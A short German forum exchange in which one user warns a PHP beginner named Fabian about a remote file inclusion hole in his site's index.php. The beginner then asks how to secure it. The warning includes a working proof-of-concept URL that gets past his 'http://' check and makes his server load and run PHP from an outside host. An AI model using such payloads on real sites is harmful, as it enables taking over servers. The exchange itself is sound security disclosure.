Hallo Fabian,
hi ueps
du hast noch ein recht großes Sicherheits Risiko auf deiner Seite,
der include() erlaubt es auch, remote-php-Files auszuführen, deine Abfrage nach "http://" ist definitiv nicht sicher.
Siehe hier:
http://fabiantranschel.i-networx.de/index.php?page=http:http:////members.tripod.de/tselb/secu
Ich würde an deiner stelle das index.php Script nochmals überarbeiten. Sprich URL fopen wrappers deaktivieren wenn möglich, oder eine bessere Abfrage machen.
welcher art? ich habe ehrlich gesagt keine wirkliche ahnung, wie ich rausbekommen kann, wo das include liegt.
wenn du mir erklären könntest, wie man das absichern kann, wäre das eine große hilfe.
aber: ich habe mir wenigstens gedanken gemacht. (was zwar nicht hilft..aber als PHP-newbie...)
Viele Grüße
ueps
Fabian